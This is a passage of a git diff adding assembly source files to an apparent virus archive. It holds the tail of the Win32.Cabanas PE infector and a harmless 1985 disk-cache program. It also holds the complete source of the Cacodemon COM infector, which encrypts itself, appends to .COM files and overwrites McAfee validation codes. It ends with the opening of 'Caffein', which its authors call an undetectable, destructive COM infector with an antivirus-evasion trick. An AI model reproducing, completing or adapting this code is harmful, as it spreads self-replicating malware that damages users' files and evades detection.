of an API function + ; exported from KERNEL32. + ;on entry: + ; EBX = KERNEL32 module handle + ; ESI = pszAPIname (pointer to API name) + ;on exit: + ; ECX = API function address + ; ECX = 0, if not found + + pop eax + push esi + push ebx + push eax + +MyGetProcAddress proc ;this function retrieves API adressez from KERNEL32 + + mov ecx,? ;this dynamic variable will hold an RVA pointer to the GetProcAddress API in the IAT +ddGetProcAddress = dword ptr $ - 4 + jecxz goto_GetProcAddressET + push esi + push ebx + add ecx,[ebp + phost_hdr - ebp_num] + call [ecx] ;call the original GetProcAddress API + xchg ecx,eax + jecxz goto_GetProcAddressET ;if error, call my own GetProcAddress function + +Ret2Pshd: + + ret (2*Pshd) + +MyGetProcAddress endp + +MyGetModuleHandleW: ;this function retrieves the base address/module handle + ; of KERNEL32 module previosly loaded to memory asumin + ; the GetModuleHandleW API was found in the import + ; table of the host + + mov ecx,? ;this dynamic variable will hold an RVA pointer to the GetModuleHandleW API in the IAT +ddGetModuleHandleW = dword ptr $ - 4 + jmp MyGetModuleHandle + +MyGetModuleHandleA: ;this function retrieves the base address/module handle + ; of KERNEL32 module previosly loaded to memory asumin + ; the GetModuleHandleA API was found in the import + ; table of the host + + mov ecx,? ;this dynamic variable will hold an RVA pointer to the GetModuleHandleA API in the IAT +ddGetModuleHandleA = dword ptr $ - 4 + +MyGetModuleHandle proc ;this function retrieves the base adress of KERNEL32 + ;on entry: + ; ECX = RVA pointer to GetModuleHandle(A/W) in the IAT + ; TOS+04h (Arg1): pointer to KERNEL32 module name + ; TOS+00h (return adress) + ;on exit: + ; Zero flag set = Base adress not found + ; Zero flag clear = Base adress found + ; EAX = KERNEL32 base adress + + sub eax,eax ;set zero flag + pop ebx ;get return adress + pop eax ;Arg1 + push ebx ;push return adress + mov ebx,[ebp + phost_hdr - ebp_num] ;get actual host base adress + jecxz end_MyGetModuleHandle ;if not valid GetModuleHandle(A/W) RVA, jump + push eax + call [ebx + ecx] ;call GetModuleHandle(A/W) API + chk_0: inc eax + jz end_MyGetModuleHandle ;if any error, not found, jump + dec eax + +end_MyGetModuleHandle: + + ret + +MyGetModuleHandleX: ;this function retrieves the KERNEL32 base adress + ; via an undocumented method. This function procedure + ; doesnt work in Winblowz NT + + mov eax,[ebx + 12345678h] +ptrForwarderChain = dword ptr $ - 4 + cmp eax,12345678h +ddForwarderChain = dword ptr $ - 4 + jnz chk_0 + ret + +MyGetModuleHandle endp + +get_ebp2: mov al,0 + jnc get_ebp ;clear carry (unicode version) + dec eax ;clear set (ansi version) + +get_ebp: call pop_ebp + +m_ebp: + +v_end: ;virus code ends here + +;uninitialized data ;these variablez will be adressed in memory, but dont waste space in the file + +ImportHdr dd ? ;import table RVA of current host +pCodeTable dd ? ;pointer to encrypted chunkz of code ;these 2 variables may overlap. + org $ - 4 ;one is used at instalation stage, +pHandlez dd ? ;pointer to top of Handlez table ;the other one used when resident. +phost_hdr dd ? ;pointer to actual base adress of host +pcode_start dd ? ;pointer to start of virus code/data in memory +K32Mod dd ? ;KERNEL32 base adress +ddGetProcAddress2 dd ? ;adress where GetProcAddress API will be stored ;these 2 variables may overlap. + org $ - 4 ;one is used at instalation stage, +pPathNamez dd ? ;pointer to top of PathNamez table ;the other one used when resident. +pNewAPIs dd ? ;pointer to new API entry in the jump table +uni_or_ansi db ? ;needed to diferentiate unicode from ansi stringz + +FunctionAdressez: ;this dwordz will hold the API function adressez used by the virus + +ddCreateFileA dd ? +ddCreateFileW dd ? +ddFindClose dd ? +ddFindFirstFileA dd ? +ddFindFirstFileW dd ? +ddFindNextFileA dd ? +ddFindNextFileW dd ? +ddSetFileAttributesA dd ? +ddSetFileAttributesW dd ? +ddCloseHandle dd ? + +ddCreateFileMappingA dd ? +ddMapViewOfFile dd ? +ddUnmapViewOfFile dd ? +ddSetFilePointer dd ? +ddSetEndOfFile dd ? +ddSetFileTime dd ? +ddGetWindowsDirectoryA dd ? +ddGetSystemDirectoryA dd ? +ddGetCurrentProcess dd ? +ddGetModuleFileName dd ? +ddWriteProcessMemory dd ? +ddWideCharToMultiByte dd ? +ddVirtualAlloc dd ? + +v_stringz: ;the API namez used by the virus are decrypted here + +vszKernel32 db 'KERNEL32',0 +vszGetModuleHandleA db 'GetModuleHandleA',0 +vszGetModuleHandleW db 'GetModuleHandleW',0 + +Exts db 'fxEtcR' ;list of extensionz to infect + db 0 + +FunctionNamez2: ;resident API namez, needed for dynamically API hookin + +vszGetProcAddress db 'GetProcAddress',0 +vszGetFileAttributesA db 'GetFileAttributesA',0 +vszGetFileAttributesW db 'GetFileAttributesW',0 +vszMoveFileExA db 'MoveFileExA',0 +vszMoveFileExW db 'MoveFileExW',0 +vsz_lopen db '_lopen',0 +vszCopyFileA db 'CopyFileA',0 +vszCopyFileW db 'CopyFileW',0 +vszOpenFile db 'OpenFile',0 +vszMoveFileA db 'MoveFileA',0 +vszMoveFileW db 'MoveFileW',0 +vszCreateProcessA db 'CreateProcessA',0 +vszCreateProcessW db 'CreateProcessW',0 + +FunctionNamez: + +vszCreateFileA db 'CreateFileA',0 +vszCreateFileW db 'CreateFileW',0 +vszFindClose db 'FindClose',0 +vszFindFirstFileA db 'FindFirstFileA',0 +vszFindFirstFileW db 'FindFirstFileW',0 +vszFindNextFileA db 'FindNextFileA',0 +vszFindNextFileW db 'FindNextFileW',0 +vszSetFileAttributesA db 'SetFileAttributesA',0 +vszSetFileAttributesW db 'SetFileAttributesW',0 + +non_res: ;non-resident API namez + +vszCloseHandle db 'CloseHandle',0 +vszCreateFileMappingA db 'CreateFileMappingA',0 +vszMapViewOfFile db 'MapViewOfFile',0 +vszUnmapViewOfFile db 'UnmapViewOfFile',0 +vszSetFilePointer db 'SetFilePointer',0 +vszSetEndOfFile db 'SetEndOfFile',0 +vszSetFileTime db 'SetFileTime',0 +vszGetWindowsDirectory db 'GetWindowsDirectoryA',0 +vszGetSystemDirectory db 'GetSystemDirectoryA',0 +vszGetCurrentProcess db 'GetCurrentProcess',0 +vszGetModuleFileName db 'GetModuleFileNameA',0 +vszWriteProcessMemory db 'WriteProcessMemory',0 +vszWideCharToMultiByte db 'WideCharToMultiByte',0 +vszVirtualAlloc db 'VirtualAlloc',0 + +EndOfFunctionNamez db 0 + +szCopyright db "(c) Win32.Cabanas v1.1 by jqwerty/29A.",0 + + org (non_res + 1) +v_end2: + +NewAPItable db nAPIS dup (?) + +FindData WIN32_FIND_DATA ? ;this structure will hold data retrieved trhu FindFirst/Next APIz + +PathName db MAX_PATH dup (?) ;filenamez will be stored here for infection + +virtual_end: ;end of virus virtual memory space (in PE filez) + +Handlez db nHANDLEZ dup (?) ;Handlez table + +PathNamez db nPATHNAMEZ dup (?) ;PathNamez table + +virtual_end2: ;end of virus virtual memory space (in flat memory) + +first_generation: ;this routine will be called only once from the first generation sample, + ;it initializes some variables needed by the virus in the first run. +jumps + push NULL + call GetModuleHandleA + test eax,eax + jz exit + xchg ecx,eax + call ref + ref: pop ebx + + mov eax,ebx + sub eax,ref - host + sub eax,ecx + sub eax,[add_1st_val] + mov [ebx + code_table - ref],eax + + mov al,6Ah + ror al,1 + xor al,[xor_2nd_val] + mov [ebx + code_table + 6 - ref],al + + mov eax,ebx + sub eax,ref - code_table + sub eax,ecx + neg eax + mov [ebx + delta_host - ref],eax + + mov [ebx + old_base - ref],ecx + + mov eax,[ebx + pfnGMH - ref] + .if word ptr [eax] == 25FFh ;jmp [xxxxxxxx] + mov eax,[eax + 2] + .endif + sub eax,ecx + mov [ebx + ddGetModuleHandleA - ref],eax ;set GetModuleHandleA RVA pointer + + mov eax,[ebx + pfnGPA - ref] + .if word ptr [eax] == 25FFh ;jmp [xxxxxxxx] + mov eax,[eax + 2] + .endif + sub eax,ecx + mov [ebx + ddGetProcAddress - ref],eax ;set GetProcAddress RVA pointer + + cld ;encrypt API stringz + mov ecx,ve_string_size + lea esi,[ebx + ve_stringz - ref] + mov edi,esi + +encrypt_stringz: + + lodsb + cmp al,80h + lahf + xor al,0B5h + ror al,cl + stosb + sahf + .if zero? + movsb + .endif + dec ecx + cmp ecx,10 + jnz encrypt_stringz + + mov ecx,v_end2 - v_stringz + lea edi,[ebx + v_stringz - ref] + mov al,-1 + rep stosb + + jmp v_start + +pfnGMH dd offset GetModuleHandleA +pfnGPA dd offset GetProcAddress + +;Host code starts here + +extrn MessageBoxA: proc +extrn ExitProcess: proc + +host: push MB_OK ;display message box + @pushsz "(c) Win32.Cabanas v1.1 by jqwerty/29A" + @pushsz "First generation sample" + push NULL + call MessageBoxA + +exit: push 0 ;exit host + call ExitProcess + + end first_generation diff --git a/MSDOS/Virus.MSDOS.Unknown.cache.asm b/MSDOS/Virus.MSDOS.Unknown.cache.asm new file mode 100644 index 00000000..84bd8c61 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cache.asm @@ -0,0 +1,255 @@ +INTERRUPTS SEGMENT AT 0H ;This is where the disk interrupt + ORG 13H*4 ;holds the address of its service routine +DISK_INT LABEL DWORD +INTERRUPTS ENDS + +CODE_SEG SEGMENT + ASSUME CS:CODE_SEG + ORG 100H ;ORG = 100H to make this into a .COM file +FIRST: JMP LOAD_CACHE ;First time through jump to initialize routine + + CPY_RGT DB '(C)1985 S.Holzner' ;A signature in bytes + TBL_LEN DW 64 ;<-- # OF SECTORS TO STORE IN CACHE, MIN=24, MAX=124. + ;THIS IS THE ONLY PLACE YOU MUST SET THIS NUMBER. EACH SECTOR = 512 BYTES. + TIME DW 0 ;Time used to time-stamp each sector + OLD_CX DW 0 ;Stores original value of CX (CX is used often) + LOW_TIM DW 0 ;Used in searching for least recently used sect. + INT13H DD 0 ;Stores the original INT 13H address + RET_ADR LABEL DWORD ;Playing games with the stack here to preserve + RET_ADR_WORD DW 2 DUP(0) ;flags returned by Int 13H + +DISK_CACHE PROC FAR ;The Disk interrupt will now come here. + ASSUME CS:CODE_SEG + CMP AX,201H ;Is this a read (AH=2) of 1 sector (AL=1)? + JE READ ;Yes, jump to Read + CMP AH,3 ;No. Perchance a write or format? + JB OLD_INT ;No, release control to old disk Int. + JMP WRITE ;Yes, jump to Write +OLD_INT:PUSHF ;Pushf for Int 13H's final Iret + CALL INT13H ;Call the Disk Int + JMP PAST ;And jump past all usual Pops +READ: PUSH BX ;Push just about every register ever heard of + PUSH CX + PUSH DX + PUSH DI + PUSH SI + PUSH DS + PUSH ES + MOV DI,BX ;Int 13H gets data address as ES:BX, switch to ES:DI + ASSUME DS:CODE_SEG ;Make sure all labels found correctly + PUSH CS ;Move CS into DS by pushing CS, popping DS + POP DS + MOV OLD_CX,CX ;Save original CX since we're about to use it + CMP DH,0 ;DH holds requested head -- head 0? + JNE NOT_FAT1 ;Nope, this can't be the first Fat sector + CMP CX,6 ;If this is the directory, check if we have a + JE FAT1 ; new disk. + CMP CX,2 ;Track 0 (CH)? Sector 2 (CL)? + JNE NOT_FAT1 ;If not, this sure isn't the FAT1 +FAT1: CALL FIND_MATCH ;DOS reads in this sector first to check disk format + JCXZ NONE ;We'll use it for a check-sum. Do we have it + MOV BX,DI ; stored yet? CX=0-->no. If yes, restore BX + MOV CX,OLD_CX ; and CX from original values + PUSHF ;And now do the Pushf and call of Int13H to read + CALL INT13H ; FAT1 + JC ERR ;If error, leave + MOV CX,256 ;No error, FAT1 was read, check our value +REPE CMPSW ; with CMPSW -- if no match, disk was changed + JCXZ BYE ;Everything checks out, Bingo, exit. + LEA SI,TABLE ;New Disk! Zero all the old disk's sectors + MOV CX,TBL_LEN ;Loop over all entries, DL holds drive # +CLR: CMP DS:[SI+2],DL ;Is this stored sector from the old disk? + JNE NO_CLR ;Nope, don't clear this entry + MOV WORD PTR DS:[SI],0 ;Match, zero this entry, zero first word +NO_CLR: ADD SI,518 ;Move on to next stored sector (512 bytes of stored + LOOP CLR ; sector and 3 words of identification & time-stamp) + JMP BYE ;Reset for new disk, let's leave +NONE: CALL STORE_SECTOR ;Store FAT1 if there was no match to it + JC ERR ;Error -- exit ungraciously + JMP BYE ;No Error, Bye. +NOT_FAT1: ;The requested sector was not FAT1. Let's + CALL FIND_MATCH ;get it. Or do we have it already? + JCXZ NO_MATCH ;No, jump to No_Match, store sector + MOV CX,512 ;ES:DI and DS:SI already set up from Find_Match +REP MOVSB ;Move 512 bytes to requested memory area + CMP WORD PTR [BX+4],0FFFFH ;Is this a a directory sector? + JE BYE ;Yes, don't reset time (already highest poss.) + INC TIME ;No, reset the time, this sector just accessed + MOV AX,TIME ;Move time into Time word of sector's 3 words + MOV [BX+4],AX ; of identification + JMP BYE ;And leave. If there's an article you'd like to +NO_MATCH: ;see, by all means write in C/O PC Magazine. + CALL STORE_SECTOR ;Don't have this sector yet, get it. + JC ERR ;If read failed, exit with error +BYE: CLC ;The exit point. Clear carry flag, set AX=1 + MOV AX,1 ; CY=0 --> no error, AH=0 --> error code = 0 +ERR: POP ES ;If error, preserve flags and AX with error code + POP DS ;Pop all conceivable registers (except AX) + POP SI + POP DI + POP DX + POP CX ;Now that the flags are set, we want to get the + POP BX ;old flags off the stack (put there by original +PAST: POP CS:RET_ADR_WORD ;Int call) To do that we save the return address + POP CS:RET_ADR_WORD[2] ;first and then pop the flags harmlessly + POP CS:OLD_CX ;into Old_CX, and then jump to RET_ADR. + JMP CS:RET_ADR ;Done with read. Now let's consider write. +WRITE: PUSH BX ;Push all registers, past and present + PUSH CX + PUSH DX + PUSH DI + PUSH SI + PUSH DS + PUSH ES + PUSH AX + CMP AX,301H ;Is this a write of one sector? + JNE NOSAVE ;No, don't save it in the sector bank + PUSH CS ;Yep, set DS (for call to Int13H label) and + POP DS ; write this sector out + PUSHF + CALL INT13H + JNC SAVE ;If there was an error we don't want to save sector + POP CS:OLD_CX ;Save AH error code, Pop old AX into Old_CX + JMP ERR ;And jump to an ignoble exit +SAVE: MOV OLD_CX,CX ;We're going to save this sector. + MOV DI,BX ;Set up DI for string move (to store written + CALL FIND_MATCH ; sector. Do we have it in memory? (set SI) + JCXZ LEAVE ;Nope, Leave (like above's Bye). + XCHG DI,SI ;Exchange destination and source + PUSH ES ;Set up DS:SI to point to where data written + POP DS ; from. We'll then use a string move + PUSH CS ;Set up ES so ES:DI points to sector bank + POP ES ; SI was set by Find_Match, Xchg'd into DI + MOV CX,512 ;Get ready to move 512 bytes +REP MOVSB ;Here we go +LEAVE: POP AX ;Here is the leave + JMP BYE ;Which only pops AX and then jumps to Bye +NOSAVE: PUSH CS ;More than 1 sector written, don't save but + POP DS ; do zero stored sectors that will be written + MOV AH,0 ;Use AX as loop index (AL=# of sectors to write) +TOP: PUSH CX ;Save CX since destroyed by Find_Match + CALL FIND_MATCH ;Do we have this one? + JCXZ NOPE ;Nope if CX = 0 + MOV WORD PTR [BX],0 ;There is a match, zero this sector +NOPE: POP CX ;Restore CX, the sector index + INC CL ;Move on to next one + DEC AX ;Decrement loop index + JNZ TOP ;And, unless that gives 0, go back again +POPS: POP AX ;Pop 'em all, starting with AX + POP ES + POP DS + POP SI + POP DI + POP DX + POP CX + POP BX + JMP OLD_INT ;And go back to OLD_INT for write. +DISK_CACHE ENDP + +FIND_MATCH PROC NEAR ;This routine finds a sector in the sector bank + PUSH AX ;And returns SI set to sector's entry, BX set + LEA SI,SECTORS ; to the beginning of the 'table' -- the 3 words + LEA BX,TABLE ;that precede all sectors. If there was no match + MOV AX,TBL_LEN ; CX=0. When Int13H called, CH=trk #, CL=sec. # + XCHG AX,CX ; DH=head #, DL=Drive #. Get Tbl_Len into CX +FIND: CMP DS:[BX],AX ;Compare stored sector's original AX to current + JNE NO ;If not, not. + CMP DS:[BX+2],DX ;If so, check DX of stored sector with current + JE GOT_IT ;Yes, there is a match, leave +NO: ADD BX,518 ;Point to next Table entry + ADD SI,518 ;And next sector too + LOOP FIND ;Keep looping until there is a match +GOT_IT: POP AX ;If there is no match, CX will be left 0 + RET ;Return +FIND_MATCH ENDP + +STORE_SECTOR PROC NEAR ;This routine, as it says, stores sectors + MOV BX,DI ;Original BX (ES:BX was original data address) + MOV CX,OLD_CX ; and CX restored (CX=trk#, Sector#) + PUSHF ;Pushf for Int 13H's Iret and call it + CALL INT13H + JNC ALL_OK ;If there was an exit, exit ignominiously + JMP FIN ;If error, leave CY flag set, code in AH, exit +ALL_OK: PUSH CX ;No error, push used registers + PUSH BX ; and find space for sector in sector bank + PUSH DX + LEA DI,SECTORS ;Point to sector bank + LEA BX,TABLE ; and Table + MOV CX,TBL_LEN ; and get ready to loop over all of them to +CHK0: CMP WORD PTR DS:[BX],0 ;find if there is an unused sector + JE FOUND ;If the first word is 0, use this sector + ADD DI,518 ;But this one isn't so update DI, SI and + ADD BX,518 ; loop again + LOOP CHK0 + MOV LOW_TIM,0FFFEH ;All sectors were filled, find least recently + LEA DI,SECTORS ; used and write over that one + LEA SI,TABLE + MOV CX,TBL_LEN ;Loop over all stored sectors +CHKTIM: MOV DX,LOW_TIM ;Compare stored sector to so-far low time + CMP [SI+4],DX + JA MORE_RECENT ;If this one is more recent, don't use it + MOV AX,DI ;This one is older than previous oldest + MOV BX,SI ;Store sector bank address (DI) and table + MOV DX,[SI+4] ; entry (now in SI) + MOV LOW_TIM,DX ;And update the Low Time to this one +MORE_RECENT: + ADD DI,518 ;Move on to next stored sector + ADD SI,518 ;And next table entry + LOOP CHKTIM ;Loop again until all covered + MOV DI,AX ;Get Sector bank address of oldest into DI +FOUND: POP DX ;Restore used registers + POP SI ;Old BX (data read-to-address) --> SI + POP CX + MOV [BX],CX ;Store the new CX as the sector's first word + MOV [BX+2],DX ;2nd word of Table is sector's DX + INC TIME ;Now find the new time + MOV AX,TIME ;Prepare to move it into 3rd word of Table + CMP DH,0 ;Is this directory or FAT? (time-->FFFF) + JNE SIDE1 ;If head is not 0, check other head + CMP CX,9 ;Head zero, trk# 0, first sector? (directory) + JLE DIR ;Yes, this is a piece we always want stored + JMP NOT_DIR ;No, definitely not FAT or directory +SIDE1: CMP DH,1 ;Head 1? + JNE NOT_DIR ;No, this is not File Alloc. Table or directory + CMP CX,2 ;Part of the top of the directory? + JA NOT_DIR ;No, go to Not_Dir and set time +DIR: MOV AX,0FFFFH ;Dir or FAT, set time high so always kept +NOT_DIR:MOV [BX+4],AX ;Not FAT or dir, store the incremented time + PUSH ES ;And now get the data to fill the sector + POP DS ;SI, DI already set. Now set ES and DS for + PUSH CS ; string move. + POP ES + MOV CX,512 ;Move 512 bytes +REP MOVSB ;Right here + CLC ;Clear the carry flag (no error) +FIN: RET ;Error exit here (do not reset CY flag) +STORE_SECTOR ENDP +TABLE: DW 3 DUP(0) ;Table and sector storage begins right here +SECTORS: ;First thing to write over is the following + ; booster program. +LOAD_CACHE PROC NEAR ;This procedure intializes everything + LEA BX,CLEAR + ASSUME DS:INTERRUPTS ;The data segment will be the Interrupt area + MOV AX,INTERRUPTS + MOV DS,AX + MOV AX,word ptr DISK_INT ;Get the old interrupt service routine + MOV word ptr INT13H,AX ; address and put it into our location MOV AX,word ptr DISK_INT[2] + ; INT13H so we can call it. + MOV word ptr INT13H[2],AX + MOV word ptr DISK_INT,OFFSET DISK_CACHE ;Now load address of Cache + MOV word ptr DISK_INT[2],CS ;routine into the Disk interrupt + MOV AX,TBL_LEN ;The number of sectors to store in cache + MOV CX,518 ;Multiply by 518 (3 words of id and 512 + MUL CX ; bytes of sector data) + MOV CX,AX ;Also, zero all the bytes so that +ZERO: MOV BYTE PTR CS:[BX],0 ; Store_Sector will find 1st word a 0, + INC BX ; indicating virgin territory. + LOOP ZERO + MOV DX,OFFSET TABLE ;To attach in memory, add # bytes to + ADD DX,AX ;store to Table's location and use + INT 27H ; Int 27H +LOAD_CACHE ENDP +CLEAR: + CODE_SEG ENDS + END FIRST ;END "FIRST" so 8088 will go to FIRST first. + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.cacodmon.asm b/MSDOS/Virus.MSDOS.Unknown.cacodmon.asm new file mode 100644 index 00000000..e672e119 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cacodmon.asm @@ -0,0 +1,336 @@ + Org 0h ; Generate .BIN file + +Start: Jmp MainVir ; Jump to decryptor code at EOF + + Db '*' ; Virus signature (very short) + +; +; Decryptor procedure +; + +MainVir: Call On1 ; Push offset on stack + +On1: Pop BP ; Calculate virus offset + Sub BP,Offset MainVir+3 ; + + Push Ax ; Save possible error code + + Lea Si,Crypt[BP] ; Decrypt the virus with a + Mov Di,Si ; very simple exclusive or + Mov Cx,CryptLen ; function. +Decrypt: Lodsb ; + Xor Al,0 ; + Stosb ; + Loop Decrypt ; + +DecrLen Equ $-MainVir ; Length of the decryptor + +; +; Main initialization procedure +; + +Crypt: Mov Ax,Cs:OrgPrg[BP] ; Store begin of host at + Mov Bx,Cs:OrgPrg[BP]+2 ; cs:100h (begin of com) + Mov Cs:Start+100h,Ax ; + Mov Cs:Start[2]+100h,Bx ; + + Xor Ax,Ax ; Get original interrupt 24 + Push Ax ; (critical error handler) + Pop Ds ; + Mov Bx,Ds:[4*24h] ; + Mov Es,Ds:[4*24h]+4 ; + + Mov Word Ptr Cs:OldInt24[Bp],Bx ; And store it on a save place + Mov Word Ptr Cs:OldInt24+2[Bp],Es ; + + Lea Bx,NewInt24[Bp] ; Install own critical error + Push Cs ; handler to avoid messages + Pop Es ; when a disk is write + Mov Word Ptr Ds:[4*24h],Bx ; protected and such things + Mov Word Ptr Ds:[4*24h]+2,Es ; + Push Cs ; + Pop Ds ; + + Mov Ah,30h ; Check if DOS version is + Int 21h ; 3.0 or above for correct + Cmp Al,3 ; interrupt use + Jae NoCLean ; + Jmp Ready + +NoClean: Mov Ah,1ah ; Store DTA at safe place + Mov Dx,0fd00h ; + Int 21h ; + + Mov Ah,4eh ; FindFirsFile Function + +Search: Lea Dx,FileSpec[BP] ; Search for filespec given + Xor Cx,Cx ; in FileSpec adress + Int 21h ; + Jnc Found ; Found - Found + Jmp Ready ; Not Found - Ready + +Found: Mov Ax,4300h ; Get file attributes and + Mov Dx,0fd1eh ; store them on the stack + Int 21h ; + Push Cx ; + + Mov Ax,4301h ; clear file attributes + Xor Cx,Cx ; + Int 21h ; + + Mov Ax,3d02h ; open file with read/write + Int 21h ; access + + Mov Bx,5700h ; save file date/time stamp + Xchg Ax,Bx ; on the stack + Int 21h ; + Push Cx ; + Push Dx ; + + Mov Ah,3fh ; read the first 4 bytes of + Lea Dx,OrgPrg[BP] ; the program onto OrgPrg + Mov Cx,4 ; + Int 21h ; + + Mov Ax,Cs:[OrgPrg][BP] ; Check if renamed exe-file + Cmp Ax,'ZM' ; + Je ExeFile ; + + Cmp Ax,'MZ' ; Check if renamed weird exe- + Je ExeFile ; file + + Mov Ah,Cs:[OrgPrg+3][BP] ; Check if already infected + Cmp Ah,'*' ; + Jne Infect ; + +ExeFile: Call Close ; If one of the checks is yes, + Mov Ah,4fh ; close file and search next + Jmp Search ; file + +FSeek: Xor Cx,Cx ; subroutine to jump to end + Xor Dx,Dx ; or begin of file + Int 21h ; + Ret ; + +Infect: Mov Ax,0fd1e[0] ; check if the file is + Cmp Ax,'OC' ; COMMAN?.COM (usually result + Jne NoCommand ; if COMMAND.COM) + Mov Ax,0fd1e[2] ; + Cmp Ax,'MM' ; + Jne NoCommand ; + Mov Ax,0fd1e[4] ; + Cmp Ax,'NA' ; + Jne NoCommand ; + + Mov Ax,4202h ; Jump to EOF + Call Fseek ; + + Cmp Ax,0f000h ; Check if file too large + Jae ExeFile + + Cmp Ax,VirS ; Check if file to short + jbe ExeFile + + Sub Ax,VirS + Xchg Cx,Dx + Mov Dx,4200h + Xchg Dx,Ax + Mov EOFminVir[BP],Dx + Int 21h + Mov Ah,3fh + Mov Dx,Offset Buffer + Mov Cx,VirS + Int 21h + Cld + Mov Si,Offset Buffer + Mov Cx,VirLen +On5: + Push Cx +On6: Lodsb + Cmp Al,0 + Jne On4 + Loop On6 +On4: Cmp Cx,0 + Je Found0 + + Pop Cx + Cmp Si,SeekLen + Jb On5 + Jmp NoCommand + +Found0: Pop Cx + Sub Si,Offset Buffer + Sub Si,Cx + Xor Cx,Cx + Mov Dx,EOFminVir[BP] + Add Dx,Si + + Mov Ax,4200h + Int 21h + Jmp CalcVirus + +EOFminVir Dw 0 + +NoCommand: Mov Ax,4202h ; jump to EOF + Call FSeek ; + + Cmp Ax,0f000h ; Check if file too large + Jb NoExe1 ; if yes, goto exefile + Jmp ExeFile ; + +NoExe1: Cmp Ax,10 ; Check if file too short + Ja NoExe2 ; if yes, goto exefile + Jmp ExeFile ; + + +NoExe2: Mov Cx,Dx ; calculate pointer to offset + Mov Dx,Ax ; EOF-52 (for McAfee validation + Sub Dx,52 ; codes) + + Mov Si,Cx ; move file pointer to the + Mov Di,Dx ; calculated address + Mov Ax,4200h ; + Int 21h ; + + Mov Ah,3fh ; read the last 52 bytes + Mov Dx,0fb00h ; of the file + Mov Cx,52 ; + Int 21h ; + + Cmp Ds:0Fb00h,0fdf0h ; check if protected with the + Jne Check2 ; AG option + Cmp Ds:0fb02h,0aac5h ; + Jne Check2 ; + + Mov Ax,4200h ; yes - let virus overwrite + Mov Cx,Si ; the code with itself, so + Mov Dx,Di ; the file has no validation + Int 21h ; code + Jmp CalcVirus ; + +Check2: Cmp Ds:0Fb00h+42,0fdf0h ; check if protected with the + Jne Eof ; AV option + Cmp Ds:0Fb02h+42,0aac5h ; + Jne Eof ; + + Mov Ax,4200h ; yes - let virus overwrite + Mov Cx,Si ; the code with itself, so + Mov Dx,Di ; the file has no validation + Add Dx,42 ; code + Int 21h ; + Jmp CalcVirus ; + +Eof: Mov Ax,4202h ; not AG or AV - jump to + Call Fseek ; EOF + +CalcVirus: Sub Ax,3 ; calculate the jump for the + Mov Cs:CallPtr[BP]+1,Ax ; virus start + +GetCrypt: Mov Ah,2ch ; get 100s seconds for the + Int 21h ; encryption value. + Cmp Dl,0 ; if not zero, goto NoZero + Jne NoZero ; + Jmp GetCrypt ; + +NoZero: Mov Cs:Decrypt+2[BP],Dl ; Store key into decryptor + + Lea Si,MainVir[BP] ; Move changed decryptor to + Mov Di,0fb00h ; a safe place in memory + Mov Cx,DecrLen ; + Rep Movsb ; + + Lea Si,Crypt[BP] ; Encrypt the virus and merge + Mov Cx,CryptLen ; it to the changed decryptor +Encrypt: Lodsb ; code + Xor Al,Dl ; + Stosb ; + Loop Encrypt ; + + Mov Ah,40h ; append virus at EOF or over + Lea Dx,0fb00h ; the validation code of + Mov Cx,VirLen ; McAfee + Int 21h ; + + Mov Ax,4200h ; Jump to BOF + Call FSeek ; + + Mov Ah,40h ; Write Jump at BOF + Lea Dx,CallPtr[BP] ; + Mov Cx,4 ; + Int 21h ; + + Call Close ; Jump to Close routine + +Ready: Mov Ah,1ah ; Restore DTA to normal + Mov Dx,80h ; offset + Int 21h ; + + Mov Ax,Cs:OldInt24[Bp] ; remove critical error + Mov Dx,Cs:OldInt24+2[Bp] ; handler and store the + Xor Bx,Bx ; original handler at the + Push Bx ; interrupt table + Pop Ds ; + Mov Ds:[4*24h],Dx ; + Mov Ds:[4*24h]+2,Ax ; + Push Cs ; + Pop Ds ; + + Pop Ax ; restore possible error code + + Mov Bx,100h ; nice way to jump to the + Push Cs ; begin of the original host + Push Bx ; code + Retf ; + + Db ' (C) 1992 John Tardy / Trident ' + +Close: Pop Si ; why??? + + Pop Dx ; restore file date/time + Pop Cx ; stamp + Mov Ax,5701h ; + Int 21h ; + + Mov Ah,3eh ; close file + Int 21h ; + + Mov Ax,4301h ; restore file attributes + Pop Cx ; + Mov Dx,0fd1eh ; + Int 21h ; + + Push Si ; why??? + Ret + +; Db 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' + Db ' Satan spawn, the Caco-Daemon - Mor(T)alities Death ' + +; +; New critical error handler +; + +NewInt24: Mov Al,3 ; supress any critical error + Iret ; messages + +OldInt24 Dd 0 ; storage place for old int 24 + +CallPtr Db 0e9h,0,0 ; jump to place at BOF + +FileSpec Db '*.COM',0 ; filespec and infection marker + +OrgPrg: Int 20h ; original program + Db 'JT' ; + +CryptLen Equ $-Crypt ; encrypted part length + +VirLen Equ $-MainVir ; total virus length + +Buffer Equ 0f040h ; buffer offset +VirS Equ VirLen*2 + +SeekLen Equ Buffer+Virs + +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 diff --git a/MSDOS/Virus.MSDOS.Unknown.caffein.asm b/MSDOS/Virus.MSDOS.Unknown.caffein.asm new file mode 100644 index 00000000..37b9189d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.caffein.asm @@ -0,0 +1,213 @@ +; ------------------------------------------------------------------------------ +; +; - Caffein - +; Created by Immortal Riot's destructive development team +; (c) 1994 The Unforgiven/Immortal Riot +; +; ------------------------------------------------------------------------------ +; Undetectable/Destructive COM-infector +; ------------------------------------------------------------------------------ +.model tiny +.code +org 100h + +v_start: + +firstgenbuffer db 0e9h,00h,00h + +virus_start: + + mov bp,0000h ; get delta offset + + call trick_tbscan ; + call decrypt ; decrypt virus + jmp short real_start ; and continue.. + +trick_tbscan: + + mov ax,0305h ; set keyb i/o + xor bx,bx ; too beat the + int 16h ; shit outta tbscan + ret + +write_virus: + + call encrypt ; write in encrypted mode + lea dx,[bp+virus_start] ; from start to virus end + mov 